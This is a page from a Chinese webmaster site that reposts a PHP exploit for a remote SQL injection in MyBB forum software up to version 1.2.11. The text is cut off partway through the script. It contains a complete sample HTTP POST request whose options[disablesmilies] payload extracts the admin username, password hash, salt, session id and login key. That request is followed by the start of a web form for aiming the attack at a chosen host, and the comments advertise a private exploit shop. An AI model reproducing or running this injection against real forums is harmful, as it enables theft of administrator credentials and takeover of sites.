站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: TGS CMS 0.3.2r2 Remote Code Execution Exploit
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 黑客漏洞 > » 正文

MyBulletinBoard (MyBB)

来源: 易采站长站
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache"); ?> <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
} -->
</style>
</head>
<body> <?php function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
} if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?f**k_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value="&#8194;get admin passwd...&#8194;"><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD">&#8194;&#172; for expamle "expdb.cc"<br>
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -